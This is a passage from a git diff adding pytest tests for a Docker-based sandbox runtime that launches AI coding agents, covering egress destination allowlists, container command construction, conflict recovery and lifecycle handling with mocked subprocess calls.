_enforced_spec_with_destinations() -> SandboxSpec: + """Enforced spec carrying resolved destination sets.""" + return SandboxSpec( + image="scc-agent-claude:latest", + workspace_mount=MountSpec(source=Path("/home/user/project"), target=Path("/workspace")), + workdir=Path("/workspace"), + network_policy="web-egress-enforced", + destination_sets=( + DestinationSet( + name="anthropic-core", + destinations=("api.anthropic.com",), + required=True, + description="Anthropic API core access", + ), + ), + ) + + +class TestDestinationSetEgressIntegration: + """Verify destination sets on SandboxSpec produce allow rules in the egress plan.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + @patch("scc_cli.adapters.oci_sandbox_runtime.compile_squid_acl") + @patch("scc_cli.adapters.oci_sandbox_runtime.build_egress_plan") + def test_destination_sets_threaded_into_egress_plan( + self, + mock_build_plan: MagicMock, + mock_compile_acl: MagicMock, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """build_egress_plan() receives destination_sets and egress_rules from spec.""" + from scc_cli.core.contracts import NetworkPolicyPlan + from scc_cli.core.enums import NetworkPolicy + + mock_build_plan.return_value = NetworkPolicyPlan( + mode=NetworkPolicy.WEB_EGRESS_ENFORCED, + enforced_by_runtime=True, + ) + mock_compile_acl.return_value = "http_access deny all\n" + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + spec = _enforced_spec_with_destinations() + runtime.run(spec) + + mock_build_plan.assert_called_once() + call_kwargs = mock_build_plan.call_args + # Positional arg: NetworkPolicy.WEB_EGRESS_ENFORCED + assert call_kwargs[0][0] is NetworkPolicy.WEB_EGRESS_ENFORCED + # Keyword: destination_sets should match spec + assert call_kwargs[1]["destination_sets"] == spec.destination_sets + # Keyword: egress_rules should contain allow rules for the destinations + egress_rules = call_kwargs[1]["egress_rules"] + assert len(egress_rules) == 1 + assert egress_rules[0].target == "api.anthropic.com" + assert egress_rules[0].allow is True + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + def test_enforced_spec_without_destinations_produces_no_allow_rules( + self, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """Enforced spec with empty destination_sets produces only deny rules in ACL.""" + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + # Use the original enforced spec (no destination_sets) + runtime.run(_enforced_spec()) + + # The call succeeded (no error). The existing topology/acl tests cover + # that the acl is correct — this test just confirms no crash on empty sets. + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + @patch("scc_cli.adapters.oci_sandbox_runtime.compile_squid_acl") + @patch("scc_cli.adapters.oci_sandbox_runtime.build_egress_plan") + def test_multiple_destination_sets_produce_multiple_allow_rules( + self, + mock_build_plan: MagicMock, + mock_compile_acl: MagicMock, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """Multiple destination sets generate allow rules for every host.""" + from scc_cli.core.contracts import NetworkPolicyPlan + from scc_cli.core.enums import NetworkPolicy + + mock_build_plan.return_value = NetworkPolicyPlan( + mode=NetworkPolicy.WEB_EGRESS_ENFORCED, + enforced_by_runtime=True, + ) + mock_compile_acl.return_value = "http_access deny all\n" + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + spec = SandboxSpec( + image="scc-agent-claude:latest", + workspace_mount=MountSpec(source=Path("/home/user/project"), target=Path("/workspace")), + workdir=Path("/workspace"), + network_policy="web-egress-enforced", + destination_sets=( + DestinationSet( + name="anthropic-core", + destinations=("api.anthropic.com",), + required=True, + ), + DestinationSet( + name="openai-core", + destinations=("api.openai.com",), + required=True, + ), + ), + ) + runtime.run(spec) + + call_kwargs = mock_build_plan.call_args + egress_rules = call_kwargs[1]["egress_rules"] + allow_targets = [r.target for r in egress_rules] + assert "api.anthropic.com" in allow_targets + assert "api.openai.com" in allow_targets + assert all(r.allow for r in egress_rules) diff --git a/tests/test_oci_sandbox_runtime.py b/tests/test_oci_sandbox_runtime.py new file mode 100644 index 0000000..e83dc67 --- /dev/null +++ b/tests/test_oci_sandbox_runtime.py @@ -0,0 +1,1455 @@ +"""Tests for OciSandboxRuntime adapter. + +All subprocess and os.execvp calls are mocked — no Docker daemon needed. +""" + +from __future__ import annotations + +import subprocess +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters.oci_sandbox_runtime import ( + _AGENT_HOME, + _AGENT_UID, + _AUTH_FILES, + _HOME_LEVEL_AUTH_LINKS, + _OCI_LABEL, + OciSandboxRuntime, + _container_name, + _normalize_provider_permissions, + _project_home_level_auth_files, +) +from scc_cli.adapters.oci_sandbox_runtime import ( + _CLAUDE_AGENT_NAME as AGENT_NAME, +) +from scc_cli.adapters.oci_sandbox_runtime import ( + _CLAUDE_DATA_VOLUME as SANDBOX_DATA_VOLUME, +) +from scc_cli.core.contracts import RuntimeInfo +from scc_cli.core.errors import ( + DockerDaemonNotRunningError, + DockerNotFoundError, + ExistingSandboxConflictError, + SandboxLaunchError, +) +from scc_cli.ports.models import ( + AgentSettings, + MountSpec, + SandboxConflict, + SandboxHandle, + SandboxSpec, + SandboxState, + SandboxStatus, +) +from tests.fakes.fake_runtime_probe import FakeRuntimeProbe + +# ── Fixtures ───────────────────────────────────────────────────────────────── + + +def _oci_capable_info(**overrides: object) -> RuntimeInfo: + """Return a RuntimeInfo describing an OCI-capable engine without sandbox.""" + defaults: dict[str, object] = { + "runtime_id": "docker", + "display_name": "Docker Engine", + "cli_name": "docker", + "supports_oci": True, + "supports_internal_networks": True, + "supports_host_network": True, + "version": "Docker version 27.5.1, build abc1234", + "daemon_reachable": True, + "sandbox_available": False, + "preferred_backend": "oci", + } + defaults.update(overrides) + return RuntimeInfo(**defaults) # type: ignore[arg-type] + + +def _minimal_spec(**overrides: object) -> SandboxSpec: + """Return a minimal SandboxSpec for testing.""" + defaults: dict[str, object] = { + "image": "scc-agent-claude:latest", + "workspace_mount": MountSpec( + source=Path("/home/user/project"), + target=Path("/workspace"), + ), + "workdir": Path("/workspace"), + } + defaults.update(overrides) + return SandboxSpec(**defaults) # type: ignore[arg-type] + + +def _docker_calls(mock_run_docker: MagicMock) -> list[list[str]]: + """Return the raw docker arg lists issued via _run_docker.""" + return [call[0][0] for call in mock_run_docker.call_args_list] + + +def _first_call(mock_run_docker: MagicMock, subcommand: str) -> list[str]: + """Return the first docker call whose subcommand matches *subcommand*.""" + for cmd in _docker_calls(mock_run_docker): + if cmd and cmd[0] == subcommand: + return cmd + raise AssertionError(f"No docker {subcommand!r} call found") + + +@pytest.fixture() +def runtime() -> OciSandboxRuntime: + probe = FakeRuntimeProbe(_oci_capable_info()) + return OciSandboxRuntime(probe) + + +# ── ensure_available ───────────────────────────────────────────────────────── + + +class TestEnsureAvailable: + """Scenario coverage for ensure_available().""" + + def test_oci_capable_engine_passes(self) -> None: + probe = FakeRuntimeProbe(_oci_capable_info()) + rt = OciSandboxRuntime(probe) + rt.ensure_available() # should not raise + + def test_not_installed_raises_docker_not_found(self) -> None: + probe = FakeRuntimeProbe( + _oci_capable_info( + version=None, + daemon_reachable=False, + ) + ) + rt = OciSandboxRuntime(probe) + with pytest.raises(DockerNotFoundError): + rt.ensure_available() + + def test_daemon_not_running_raises(self) -> None: + probe = FakeRuntimeProbe( + _oci_capable_info( + daemon_reachable=False, + version="Docker version 27.5.1, build abc1234", + ) + ) + rt = OciSandboxRuntime(probe) + with pytest.raises(DockerDaemonNotRunningError): + rt.ensure_available() + + def test_no_oci_support_raises(self) -> None: + probe = FakeRuntimeProbe(_oci_capable_info(supports_oci=False)) + rt = OciSandboxRuntime(probe) + with pytest.raises(DockerNotFoundError, match="OCI containers"): + rt.ensure_available() + + def test_sandbox_not_required(self) -> None: + """OciSandboxRuntime should NOT check sandbox_available.""" + probe = FakeRuntimeProbe(_oci_capable_info(sandbox_available=False)) + rt = OciSandboxRuntime(probe) + rt.ensure_available() # should not raise + + +# ── run ────────────────────────────────────────────────────────────────────── + + +class TestRun: + """Verify docker create / start / exec command construction.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_basic_run_builds_correct_commands( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + container_id = "abc123def456" + mock_run_docker.return_value = MagicMock(stdout=f" {container_id} \n") + + spec = _minimal_spec() + handle = runtime.run(spec) + + # Calls: ps lookup, create, start, normalize-dir, normalize-auth x2, project-home-auth + assert mock_run_docker.call_count == 7 + + create_cmd = _first_call(mock_run_docker, "create") + assert create_cmd[0] == "create" + assert "--name" in create_cmd + assert spec.image in create_cmd + + start_cmd = _first_call(mock_run_docker, "start") + assert start_cmd == ["start", container_id] + + # execvp called with docker exec + mock_execvp.assert_called_once() + exec_argv = mock_execvp.call_args[0][1] + assert exec_argv[0] == "docker" + assert "exec" in exec_argv + assert container_id in exec_argv + assert AGENT_NAME in exec_argv + assert "--dangerously-skip-permissions" in exec_argv + + assert handle.sandbox_id == container_id + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_workspace_mount_in_create( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec() + runtime.run(spec) + + create_cmd = _first_call(mock_run_docker, "create") + mount_str = f"{spec.workspace_mount.source}:{spec.workspace_mount.target}" + assert mount_str in create_cmd + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_credential_volume_in_create( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec() + runtime.run(spec) + + create_cmd = _first_call(mock_run_docker, "create") + cred_mount = f"{SANDBOX_DATA_VOLUME}:/home/agent/.claude" + assert cred_mount in create_cmd + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_env_vars_in_create( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec(env={"MY_KEY": "my_val", "OTHER": "123"}) + runtime.run(spec) + + create_cmd = _first_call(mock_run_docker, "create") + assert "-e" in create_cmd + assert "MY_KEY=my_val" in create_cmd + assert "OTHER=123" in create_cmd + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_oci_label_in_create( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec() + runtime.run(spec) + + create_cmd = _first_call(mock_run_docker, "create") + assert "--label" in create_cmd + label_idx = create_cmd.index("--label") + assert create_cmd[label_idx + 1] == _OCI_LABEL + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_image_consumed_from_spec( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + custom_image = "my-registry.io/custom-agent:v2" + spec = _minimal_spec(image=custom_image) + runtime.run(spec) + + create_cmd = _first_call(mock_run_docker, "create") + assert custom_image in create_cmd + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_create_overrides_entrypoint_and_uses_shell_args_once( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec() + runtime.run(spec) + + create_cmd = _first_call(mock_run_docker, "create") + entrypoint_idx = create_cmd.index("--entrypoint") + assert create_cmd[entrypoint_idx + 1] == "/bin/bash" + assert create_cmd[-2:] == ["-c", "sleep infinity"] + assert "/bin/bash" not in create_cmd[entrypoint_idx + 2 :] + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_continue_session_flag( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec(continue_session=True) + runtime.run(spec) + + exec_argv = mock_execvp.call_args[0][1] + assert "-c" in exec_argv + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_agent_settings_injected( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + settings = AgentSettings( + rendered_bytes=b'{"key": "value"}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + # Calls: ps lookup, create, start, normalize-dir, normalize-auth x2, project-home-auth, cp + assert mock_run_docker.call_count == 8 + cp_cmd = _first_call(mock_run_docker, "cp") + assert cp_cmd[0] == "cp" + assert "cid123:" in cp_cmd[2] + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_settings_written_as_raw_bytes_not_json( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """D035: runtime writes rendered_bytes verbatim, no json.dumps.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + raw_toml = b'model = "o3"\ncli_auth_credentials_store = "file"\n' + settings = AgentSettings( + rendered_bytes=raw_toml, + path=Path("/home/agent/.codex/config.toml"), + suffix=".toml", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + # The cp call should use a .toml suffix temp file (after normalization) + cp_cmd = _first_call(mock_run_docker, "cp") + assert cp_cmd[0] == "cp" + assert cp_cmd[1].endswith(".toml") # temp file suffix + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_workdir_in_exec( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec(workdir=Path("/custom/workdir")) + runtime.run(spec) + + exec_argv = mock_execvp.call_args[0][1] + assert "-w" in exec_argv + assert "/custom/workdir" in exec_argv + + +# ── Failure modes ──────────────────────────────────────────────────────────── + + +class TestFailureModes: + """Verify error handling for subprocess failures and timeouts.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_create_failure_raises_launch_error( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.side_effect = SandboxLaunchError( + user_message="Docker command failed", + command="docker create ...", + stderr="name already in use", + ) + with pytest.raises(SandboxLaunchError, match="Docker command failed"): + runtime.run(_minimal_spec()) + + @patch("scc_cli.adapters.oci_sandbox_runtime.subprocess.run") + def test_create_timeout_raises_launch_error( + self, mock_subprocess: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_subprocess.side_effect = subprocess.TimeoutExpired(cmd="docker create", timeout=60) + with pytest.raises(SandboxLaunchError, match="timed out"): + runtime.run(_minimal_spec()) + + @patch("scc_cli.adapters.oci_sandbox_runtime.subprocess.run") + def test_create_nonzero_exit_raises_launch_error( + self, mock_subprocess: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_subprocess.side_effect = subprocess.CalledProcessError( + returncode=1, cmd="docker create", stderr="conflict" + ) + with pytest.raises(SandboxLaunchError): + runtime.run(_minimal_spec()) + + +class TestExistingContainerRecovery: + """Verify deterministic-name conflicts are handled intentionally.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager.teardown") + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_stopped_container_is_removed_before_recreate( + self, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + mock_teardown: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tExited (0) 1 minute ago\n"), # ps -a lookup + MagicMock(stdout=""), # rm -f old123 + MagicMock(stdout="new456\n"), # docker create + MagicMock(stdout=""), # docker start + MagicMock(stdout=""), # normalize dir + MagicMock(stdout=""), # normalize auth (.credentials.json) + MagicMock(stdout=""), # normalize auth (.claude.json) + MagicMock(stdout=""), # project home auth + ] + + runtime.run(_minimal_spec()) + + assert mock_run_docker.call_args_list[1][0][0] == ["rm", "-f", "old123"] + assert mock_run_docker.call_args_list[2][0][0][0] == "create" + mock_teardown.assert_called_once() + assert mock_execvp.called + + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager.teardown") + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_idle_keepalive_container_is_replaced_automatically( + self, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + mock_teardown: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), # ps -a lookup + MagicMock(stdout="Ss sleep sleep infinity\n"), # docker top + MagicMock(stdout=""), # rm -f old123 + MagicMock(stdout="new456\n"), # docker create + MagicMock(stdout=""), # docker start + MagicMock(stdout=""), # normalize dir + MagicMock(stdout=""), # normalize auth (.credentials.json) + MagicMock(stdout=""), # normalize auth (.claude.json) + MagicMock(stdout=""), # project home auth + ] + + runtime.run(_minimal_spec()) + + assert mock_run_docker.call_args_list[2][0][0] == ["rm", "-f", "old123"] + assert mock_run_docker.call_args_list[3][0][0][0] == "create" + mock_teardown.assert_called_once() + assert mock_execvp.called + + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager.teardown") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_running_live_container_raises_specific_conflict( + self, + mock_run_docker: MagicMock, + mock_teardown: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), # ps -a lookup + MagicMock(stdout="COMMAND COMMAND\npython python -m codex\n"), # docker top + ] + + with pytest.raises(ExistingSandboxConflictError, match="already running"): + runtime.run(_minimal_spec()) + + mock_teardown.assert_not_called() + + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager.teardown") + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_keepalive_with_only_defunct_children_is_replaced_automatically( + self, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + mock_teardown: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), # ps -a lookup + MagicMock( + stdout=("Ss sleep sleep infinity\nZ git [git] \nZ git [git] \n") + ), + MagicMock(stdout=""), # rm -f old123 + MagicMock(stdout="new456\n"), # docker create + MagicMock(stdout=""), # docker start + MagicMock(stdout=""), # normalize dir + MagicMock(stdout=""), # normalize auth (.credentials.json) + MagicMock(stdout=""), # normalize auth (.claude.json) + MagicMock(stdout=""), # project home auth + ] + + runtime.run(_minimal_spec()) + + assert mock_run_docker.call_args_list[2][0][0] == ["rm", "-f", "old123"] + assert mock_run_docker.call_args_list[3][0][0][0] == "create" + mock_teardown.assert_called_once() + assert mock_execvp.called + + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager.teardown") + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_force_new_replaces_running_container_without_idle_check( + self, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + mock_teardown: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), # ps -a lookup + MagicMock(stdout=""), # rm -f old123 + MagicMock(stdout="new456\n"), # docker create + MagicMock(stdout=""), # docker start + MagicMock(stdout=""), # normalize dir + MagicMock(stdout=""), # normalize auth (.credentials.json) + MagicMock(stdout=""), # normalize auth (.claude.json) + MagicMock(stdout=""), # project home auth + ] + + runtime.run(_minimal_spec(force_new=True)) + + # No docker top call in the force-new path; remove happens immediately. + assert mock_run_docker.call_args_list[1][0][0] == ["rm", "-f", "old123"] + assert mock_run_docker.call_args_list[2][0][0][0] == "create" + mock_teardown.assert_called_once() + assert mock_execvp.called + + +class TestDetectLaunchConflict: + """Verify launch-conflict detection only reports live user-visible conflicts.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_returns_none_when_no_existing_container( + self, + mock_run_docker: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="") + + assert runtime.detect_launch_conflict(_minimal_spec()) is None + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_returns_none_for_stopped_container( + self, + mock_run_docker: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="old123\tExited (0) 1 minute ago\n") + + assert runtime.detect_launch_conflict(_minimal_spec()) is None + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_returns_none_for_idle_keepalive_container( + self, + mock_run_docker: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), + MagicMock(stdout="Ss sleep sleep infinity\n"), + ] + + assert runtime.detect_launch_conflict(_minimal_spec()) is None + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_returns_none_for_keepalive_with_only_defunct_children( + self, + mock_run_docker: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), + MagicMock( + stdout=("Ss sleep sleep infinity\nZ git [git] \nZ git [git] \n") + ), + ] + + assert runtime.detect_launch_conflict(_minimal_spec()) is None + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_returns_conflict_for_running_agent_process( + self, + mock_run_docker: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + mock_run_docker.side_effect = [ + MagicMock(stdout="old123\tUp 2 minutes\n"), + MagicMock(stdout="Ss codex codex --dangerously-bypass-approvals-and-sandbox\n"), + MagicMock(stdout="Ss codex codex --dangerously-bypass-approvals-and-sandbox\n"), + ] + + conflict = runtime.detect_launch_conflict(_minimal_spec()) + + assert conflict == SandboxConflict( + handle=SandboxHandle( + sandbox_id="old123", name=_container_name(Path("/home/user/project")) + ), + state=SandboxState.RUNNING, + process_summary="codex --dangerously-bypass-approvals-and-sandbox", + ) + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_force_new_skips_conflict_detection( + self, + mock_run_docker: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + assert runtime.detect_launch_conflict(_minimal_spec(force_new=True)) is None + mock_run_docker.assert_not_called() + + +# ── list_running ───────────────────────────────────────────────────────────── + + +class TestListRunning: + """Verify parsing of ``docker ps`` output.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_parses_multiple_containers( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock( + stdout="abc123\tscc-oci-aaa\ndef456\tscc-oci-bbb\n" + ) + handles = runtime.list_running() + assert len(handles) == 2 + assert handles[0] == SandboxHandle(sandbox_id="abc123", name="scc-oci-aaa") + assert handles[1] == SandboxHandle(sandbox_id="def456", name="scc-oci-bbb") + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_empty_output(self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime) -> None: + mock_run_docker.return_value = MagicMock(stdout="") + assert runtime.list_running() == [] + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_single_column_output( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_run_docker.return_value = MagicMock(stdout="abc123\n") + handles = runtime.list_running() + assert len(handles) == 1 + assert handles[0].sandbox_id == "abc123" + assert handles[0].name is None + + +# ── status ─────────────────────────────────────────────────────────────────── + + +class TestStatus: + """Verify docker inspect → SandboxState mapping.""" + + @pytest.mark.parametrize( + ("raw_status", "expected_state"), + [ + ("running", SandboxState.RUNNING), + ("created", SandboxState.CREATED), + ("exited", SandboxState.STOPPED), + ("dead", SandboxState.STOPPED), + ("paused", SandboxState.RUNNING), + ("restarting", SandboxState.RUNNING), + ("something_else", SandboxState.UNKNOWN), + ], + ) + @patch("scc_cli.adapters.oci_sandbox_runtime.subprocess.run") + def test_state_mapping( + self, + mock_subprocess: MagicMock, + raw_status: str, + expected_state: SandboxState, + runtime: OciSandboxRuntime, + ) -> None: + mock_subprocess.return_value = MagicMock(returncode=0, stdout=f"{raw_status}\n") + handle = SandboxHandle(sandbox_id="abc123") + result = runtime.status(handle) + assert result.state == expected_state + + @patch("scc_cli.adapters.oci_sandbox_runtime.subprocess.run") + def test_inspect_failure_returns_unknown( + self, mock_subprocess: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_subprocess.return_value = MagicMock(returncode=1, stdout="") + handle = SandboxHandle(sandbox_id="gone") + assert runtime.status(handle) == SandboxStatus(state=SandboxState.UNKNOWN) + + @patch("scc_cli.adapters.oci_sandbox_runtime.subprocess.run") + def test_inspect_timeout_returns_unknown( + self, mock_subprocess: MagicMock, runtime: OciSandboxRuntime + ) -> None: + mock_subprocess.side_effect = subprocess.TimeoutExpired(cmd="docker inspect", timeout=10) + handle = SandboxHandle(sandbox_id="slow") + assert runtime.status(handle) == SandboxStatus(state=SandboxState.UNKNOWN) + + +# ── resume / stop / remove ─────────────────────────────────────────────────── + + +class TestLifecycle: + """Verify resume, stop, and remove delegate correctly.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_resume(self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime) -> None: + runtime.resume(SandboxHandle(sandbox_id="cid")) + mock_run_docker.assert_called_once_with(["start", "cid"], timeout=30) + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_stop(self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime) -> None: + runtime.stop(SandboxHandle(sandbox_id="cid")) + mock_run_docker.assert_called_once_with(["stop", "cid"], timeout=15) + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_remove(self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime) -> None: + runtime.remove(SandboxHandle(sandbox_id="cid")) + mock_run_docker.assert_called_once_with(["rm", "-f", "cid"], timeout=15) + + +# ── Network enforcement ────────────────────────────────────────────────────── + + +class TestNetworkEnforcement: + """Verify _build_create_cmd produces correct --network flags for all modes.""" + + def test_enforced_mode_adds_network_flag(self) -> None: + """web-egress-enforced with a network name → --network in command.""" + spec = _minimal_spec(network_policy="web-egress-enforced") + cmd = OciSandboxRuntime._build_create_cmd( + spec, + "scc-oci-test", + network_name="scc-egress-scc-oci-test", + ) + assert "--network" in cmd + idx = cmd.index("--network") + assert cmd[idx + 1] == "scc-egress-scc-oci-test" + + def test_locked_down_mode_adds_network_none(self) -> None: + """locked-down-web → --network none.""" + spec = _minimal_spec(network_policy="locked-down-web") + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + assert "--network" in cmd + idx = cmd.index("--network") + assert cmd[idx + 1] == "none" + + def test_open_mode_no_network_flag(self) -> None: + """open → no --network flag.""" + spec = _minimal_spec(network_policy="open") + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + assert "--network" not in cmd + + def test_none_policy_no_network_flag(self) -> None: + """None (unset) → no --network flag.""" + spec = _minimal_spec(network_policy=None) + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + assert "--network" not in cmd + + def test_enforced_mode_injects_proxy_env(self) -> None: + """Proxy env vars appear in the create command for enforced mode.""" + spec = _minimal_spec(network_policy="web-egress-enforced") + 